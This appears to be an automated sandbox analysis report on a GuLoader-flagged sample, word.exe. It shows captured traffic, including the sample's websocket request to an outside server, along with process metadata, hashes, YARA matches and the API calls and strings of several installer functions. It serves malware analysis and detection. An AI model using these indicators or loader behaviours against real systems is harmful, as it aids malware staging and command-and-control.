2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 24 5c 88 92 48 22 cb 58 7c 49 e5 62 4c 82 73 54 86 bd 4e 41 01 11 e8 e2 01 40 5d 47 d0 4b 2a 6b af 19 4c ad 9a 1e ea 18 62 82 5d 93 94 01 38 ea 10 6b f4 10 ea 37 44 22 e7 9d 6f 99 b0 76 b5 09 e3 73 8c 63 e1 7e bd 5b ab 0a 2f ec be d8 5c 70 7f 59 fc 31 b5 24 b4 26 d8 5f 4b 44 be 2a 8b 6e d0 2b 15 e9 ac 92 c1 c1 de 73 82 63 c5 fc 4c 62 7c e9 24 80 ea a5 13 94 f4 c4 92 d6 06 14 27 75 ff f0 7b 4f f1 39 65 fc cd 71 68 e3 fa 9e 33 0c c3 e1 e3 36 b8 0e e1 c2 ab 1e 5b df a4 ac 92 ab 2a 4c b3 cd 77 b9 30 6e 13 c9 f4 b0 27 3f c7 ea b0 f4 b0 ad b9 64 98 9a f2 37 0f 60 40 ae 4f c4 e1 26 a0 55 bb 44 9d 1d 78 b5 3f 81 e6 57 25 a8 43 83 fc d0 cb 7c 46 30 85 23 ee 96 96 e3 54 6a 5c 5a cf dc 68 b6 6e b3 32 a4 81 09 69 e7 ab b3 08 fe 27 84 78 aa bc 33 93 c4 5c 9b 6c e7 bd Data Ascii: $\H"X\|IbLsTNA@]GKkLb]8k7D"ovsc~[/\pY1$&_KDn+scLb\|$'u{O9eqh36[*Lw0n'?d7`@O&UDx?W%C\|F0#Tj\Zhn2i'x3\l
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 09 81 77 0d c0 56 93 9c 7a 48 e8 6b 3d 86 0c fb 45 78 43 d6 ed 00 c6 b0 74 c4 7f e1 08 da 75 8e 02 bf 20 f2 0a 2d 93 a7 9b 5d 74 62 36 87 4a e7 2e b4 24 d8 da 3a 14 be 2e ff 25 81 2a 65 8c 96 d7 c0 cb d4 75 82 63 ee fc 4c 62 61 fb 30 80 90 d5 4b 19 ce ce 92 d5 58 77 25 0e a0 9f 42 4b 53 16 70 85 cf 2d 68 e7 91 06 16 14 cb 9a b3 34 c3 7f 43 e7 b6 6e 50 aa a4 dc f9 5c 0f 56 bb b6 1f c2 45 6a b1 e8 9d c2 49 58 b7 85 85 56 95 bb bb 1d 8a ef f2 33 a9 52 32 f4 35 ac eb 26 a6 8c e7 5a 9f 62 07 c7 3f 85 4e 1d 64 a1 41 f2 a4 d2 b0 01 e4 15 9e 3f 83 9e cf e3 5e 6e fc 04 a9 d7 6a c9 5b c7 32 a0 29 34 fb c9 a9 c8 5d db 31 82 a1 bf 69 33 97 6c 79 8e 15 cf c6 f0 da 71 01 99 40 03 3b a2 46 2b cb 59 f5 f9 dd 6e 52 20 7b 70 d8 53 c8 5c e3 4f 1e 47 4a 3b 48 0e 05 25 a2 c3 Data Ascii: wVzHk=ExCtu -]tb6J.$:.%*eucLba0KXw%BKSp-h4CnP\VEjIXV3R25&Zb?NdA?^nj[2)4]1i3lyq@;F+YnR {pS\OGJ;H%
2024-08-22 14:13:35 UTC	4096	IN	Data Raw: 36 9a bd 91 5d 00 d7 7c e4 4c ff be 16 0a d8 a0 4d 1e ae 2b 8d 6f d0 32 15 93 c0 a5 a0 d6 d4 03 a8 5d 96 fc 46 6d 3b 2c 25 80 ea bd 71 6d cf c4 98 db 2b 8c 4c 14 fc d8 0e 4a 53 16 7f e4 be a3 01 bb 73 e0 16 14 c0 89 b1 3f ae 1b 47 f1 a8 34 56 be a4 a6 96 01 19 47 b5 ac 15 37 59 42 c7 ed ef b8 5c 5a bc 95 b4 56 91 a2 b3 0e f9 b6 e0 33 af 3e dd ac 34 a8 f0 22 cb 47 9e 5a 95 40 2f 9e 16 85 46 65 47 de 41 f8 a0 d2 b0 f9 e4 15 9e 38 e8 fb de e7 da 07 fc 81 d6 43 6a cd 32 c0 10 a1 23 26 62 84 de c9 5c f4 01 80 cd d6 6f 18 93 df 5a b3 17 b4 ae c0 dc 75 c8 f6 35 03 06 a8 46 3c c9 20 f7 78 dd 6a 24 b3 01 08 a9 3c 97 5c e1 3e 9e 45 31 46 27 42 01 0d f5 d5 dd ad c1 9b 4c 94 f5 a9 20 e4 7f e0 a8 65 b5 b6 25 98 e0 ed 3a e2 1f 92 da b8 3d ff 35 ae 45 b5 e1 9f b1 bf 9a Data Ascii: 6]\|LM+o2]Fm;,%qm+LJSs?G4VG7YB\ZV3>4"GZ@/FeGA8Cj2#&b\oZu5F< xj$<\>E1F'BL e%:=5E

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49795	186.2.171.76	443	8792	C:\Users\user\Desktop\word.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-22 14:13:46 UTC	235	OUT	GET /agent.ashx HTTP/1.1 Host: 186.2.171.76 Upgrade: websocket Connection: Upgrade Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ== Sec-WebSocket-Version: 13 Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
2024-08-22 14:13:47 UTC	651	IN	HTTP/1.1 404 Not Found Referrer-Policy: no-referrer X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; Content-Type: text/html; charset=utf-8 Content-Length: 2551 ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo" Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponly Set-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponly Vary: Accept-Encoding Date: Thu, 22 Aug 2024 14:13:46 GMT Connection: close
2024-08-22 14:13:47 UTC	2551	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 43 6f 6e 74 65 6e 74 2d 54 79 70 65 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 Data Ascii: <!DOCTYPE html><html lang="en" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head> <meta http-equiv=X-UA-Compatible content="IE=edge" /> <meta content="text/html;charset=utf-8" http-equiv=Content-Type /> <meta name=viewport content="user-s

Target ID:	0
Start time:	10:12:05
Start date:	22/08/2024
Path:	C:\Users\user\Desktop\word.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\word.exe"
Imagebase:	0x400000
File size:	721'136 bytes
MD5 hash:	0EA4553778672B58BBD711FB039552C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	10:13:16
Start date:	22/08/2024
Path:	C:\Users\user\Desktop\word.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\word.exe"
Imagebase:	0x400000
File size:	721'136 bytes
MD5 hash:	0EA4553778672B58BBD711FB039552C8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.2%
Dynamic/Decrypted Code Coverage:	14.2%
Signature Coverage:	20.8%
Total number of Nodes:	1468
Total number of Limit Nodes:	38

Executed Functions

Function 00403217 Relevance: 80.8, APIs: 27, Strings: 19, Instructions: 337
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 00403238
SetErrorMode.KERNELBASE(00008001), ref: 00403243
OleInitialize.OLE32(00000000), ref: 0040324A

Part of subcall function 0040601C: GetModuleHandleA.KERNEL32(?,?,?,0040325C,00000009), ref: 0040602E
Part of subcall function 0040601C: LoadLibraryA.KERNELBASE(?,?,?,0040325C,00000009), ref: 00406039
Part of subcall function 0040601C: GetProcAddress.KERNEL32(00000000,?), ref: 0040604A

SHGetFileInfoA.SHELL32(0041ECB8,00000000,?,?,00000000,00000009), ref: 00403272

Part of subcall function 00405CF1: lstrcpynA.KERNEL32(?,?,00000400,00403287,00422F00,NSIS Error), ref: 00405CFE

GetCommandLineA.KERNEL32(00422F00,NSIS Error), ref: 00403287
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\word.exe",00000000), ref: 0040329A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\word.exe",00000020), ref: 004032C5
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004033C2
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004033D3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033DF
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004033F3
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033FB
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040340C
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403414
DeleteFileA.KERNELBASE(1033), ref: 00403428
OleUninitialize.OLE32(?), ref: 004034D6
ExitProcess.KERNEL32 ref: 004034F6
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\word.exe",00000000,?), ref: 00403502
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop), ref: 0040350E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040351A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403521
DeleteFileA.KERNEL32(0041E8B8,0041E8B8,?,user32::EnumWindows(i r1 ,i 0),?), ref: 0040357A
CopyFileA.KERNEL32(C:\Users\user\Desktop\word.exe,0041E8B8,00000001), ref: 0040358E
CloseHandle.KERNEL32(00000000,0041E8B8,0041E8B8,?,0041E8B8,00000000), ref: 004035BB
GetCurrentProcess.KERNEL32(?,?,00000006,00000005,?), ref: 00403614
ExitWindowsEx.USER32(00000002,80040002), ref: 0040366C
ExitProcess.KERNEL32 ref: 0040368F

Strings

TEMP, xrefs: 00403407
", xrefs: 004032EA
~nsu.tmp, xrefs: 004034FC
C:\Users\user\spherosome\preadoption\preembodiment, xrefs: 004033A7, 004034A8, 00403527, 00403530
`KYw, xrefs: 00403400
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403227
Error launching installer, xrefs: 0040348E
\Temp, xrefs: 004033D9
SeShutdownPrivilege, xrefs: 00403626
1033, xrefs: 00403423
"C:\Users\user\Desktop\word.exe", xrefs: 0040328D, 00403293, 0040344C
C:\Users\user\Desktop\word.exe, xrefs: 00403589
TMP, xrefs: 0040340F
NSIS Error, xrefs: 00403278
C:\Users\user\AppData\Local\Temp\, xrefs: 004033B7, 004033BC, 004033D2, 004033DE, 004033ED, 004033FA, 00403406, 0040340E, 00403501, 0040350D, 00403519, 00403520, 004035CF
C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 004034B3
user32::EnumWindows(i r1 ,i 0), xrefs: 0040353E
Low, xrefs: 004033F5
C:\Users\user\Desktop, xrefs: 00403507, 0040350C, 0040352F

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
String ID: "$"C:\Users\user\Desktop\word.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\word.exe$C:\Users\user\spherosome\preadoption\preembodiment$C:\Users\user\spherosome\preadoption\preembodiment\Himlede$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$`KYw$user32::EnumWindows(i r1 ,i 0)$~nsu.tmp
API String ID: 4107622049-1750502713
Opcode ID: 7fa4d376e80a765003bfd3befb9d552c5c4fbafe01cf9df5d54f5772ac0bf63e
Instruction ID: a1c447b546bb562fff2a187ff51308e62fc677b1bbcaaf8e03341a31a96d3340
Opcode Fuzzy Hash: 7fa4d376e80a765003bfd3befb9d552c5c4fbafe01cf9df5d54f5772ac0bf63e
Instruction Fuzzy Hash: DFB1F570608351BAE7216F619C8DA2B3EA89B45706F04443FF541BA2D2C77C9E01CB6E

Function 00405D13 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405DC4
GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405E3F
GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405E52
SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E8E
SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00405E9C
CoTaskMemFree.OLE32(00000000), ref: 00405EA7
lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EC9
lstrlenA.KERNEL32(Call,?,0041F4D8,00000000,00405014,0041F4D8,00000000), ref: 00405F1B

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405EC3
+/R, xrefs: 00405D20
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E0E
user32::EnumWindows(i r1 ,i 0), xrefs: 00405EF3
Call, xrefs: 00405D3A, 00405E0C, 00405E29, 00405E3E, 00405E51, 00405E6D, 00405E98, 00405EC8, 00405ECE, 00405EE6, 00405EF9, 00405F14, 00405F1A, 00405F25, 00405F4F

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: +/R$Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$user32::EnumWindows(i r1 ,i 0)
API String ID: 900638850-1873685383
Opcode ID: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction ID: c546ec396b89b09005d3c5f1d9b4a4bf58d4ceda60e07cc515ef6374c73a2cb0
Opcode Fuzzy Hash: 61e6d1e2250e956bb5bd6cc292287568ebfec5cbdb9a83a556c9a0d1fe3f13fc
Instruction Fuzzy Hash: 07610471A04A02AAEF216F64DC847BF3B64DB51305F50813BE941B62D1D37C8A42DF9E

Function 004055B1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 004055DA
lstrcatA.KERNEL32(00420D00,\*.*,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405622
lstrcatA.KERNEL32(?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405643
lstrlenA.KERNEL32(?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 00405649
FindFirstFileA.KERNEL32(00420D00,?,?,?,00409014,?,00420D00,?,?,C:\Users\user\AppData\Local\Temp\,77582EE0,00000000), ref: 0040565A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405707
FindClose.KERNEL32(00000000), ref: 00405718

Strings

"C:\Users\user\Desktop\word.exe", xrefs: 004055B1
\*.*, xrefs: 0040561C
C:\Users\user\AppData\Local\Temp\, xrefs: 004055BF

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\word.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1750612876
Opcode ID: 22969863301cb19216d051acf74f02a24dce50bcb235e6d7d36d73776f663258
Instruction ID: 987af563c2c121d98d0664262626d3ce0c78e9a6bdf03ff904ac809f9c790c88
Opcode Fuzzy Hash: 22969863301cb19216d051acf74f02a24dce50bcb235e6d7d36d73776f663258
Instruction Fuzzy Hash: 0F51CF70800A44BADF216A629C45BBF7AB8DF42754F54803BF445B21D2D73C9942EF6E

Function 00401F68 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,?), ref: 00401F93

Part of subcall function 00404FDC: lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
Part of subcall function 00404FDC: lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
Part of subcall function 00404FDC: lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
Part of subcall function 00404FDC: SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
Part of subcall function 00404FDC: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098

LoadLibraryExA.KERNELBASE(00000000,?,?,00000001,?), ref: 00401FA3
GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,?,00000001,?), ref: 0040201D

Strings

user32::EnumWindows(i r1 ,i 0), xrefs: 00401FE7

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID: user32::EnumWindows(i r1 ,i 0)
API String ID: 2987980305-797600110
Opcode ID: 6a4779d3db91ae85148ae6d6eeeaf7d80a6810b4983c01acf47586cbbec28c98
Instruction ID: 3f2733cfc3de05a67066b1a81d0209d8d10e728cfd6e940428cc792ad37f86ee
Opcode Fuzzy Hash: 6a4779d3db91ae85148ae6d6eeeaf7d80a6810b4983c01acf47586cbbec28c98
Instruction Fuzzy Hash: 9A21EB72904215BBCF10BFA4CE4DA6E79B0AB44358F60823BF601B62D1D7BD4D41EA5E

Function 00402036 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,?,00000045,000000CD,00000002,000000DF,?), ref: 0040208B
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00407374,?,?), ref: 00402143

Strings

C:\Users\user\spherosome\preadoption\preembodiment\Himlede, xrefs: 004020CB

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\spherosome\preadoption\preembodiment\Himlede
API String ID: 123533781-3180547735
Opcode ID: 67eeef5bfe48d64c696600bc04f6a24e74d7f241817d7ead55992a07deef4c16
Instruction ID: 8923a1fbb4e768f6885cfedd98bdb4ab1c3b58066d3a845fdfa0f70482a78e56
Opcode Fuzzy Hash: 67eeef5bfe48d64c696600bc04f6a24e74d7f241817d7ead55992a07deef4c16
Instruction Fuzzy Hash: 02416D71A00209BFCB40DFA4CE88E9E7BB5BF48354B2042A9F911FB2D1D6799D41DB54

Function 004062CB Relevance: 5.4, APIs: 4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_word.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction ID: b03426f2c8dea12abf8fb2d8b94ab036f7606c67c5ec72f888080e52c6ca951d
Opcode Fuzzy Hash: b324f5448a4cd5c229321874d8756ea75b0658bb7580570e0968ebdfa53b276b
Instruction Fuzzy Hash: 3FF15470D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF45

Function 00405FF5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNELBASE(?,00421548,C:\,004058B2,C:\,C:\,00000000,C:\,C:\,?,?,77582EE0,004055D1,?,C:\Users\user\AppData\Local\Temp\,77582EE0), ref: 00406000
FindClose.KERNEL32(00000000), ref: 0040600C

Strings

C:\, xrefs: 00405FF5

Memory Dump Source

Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
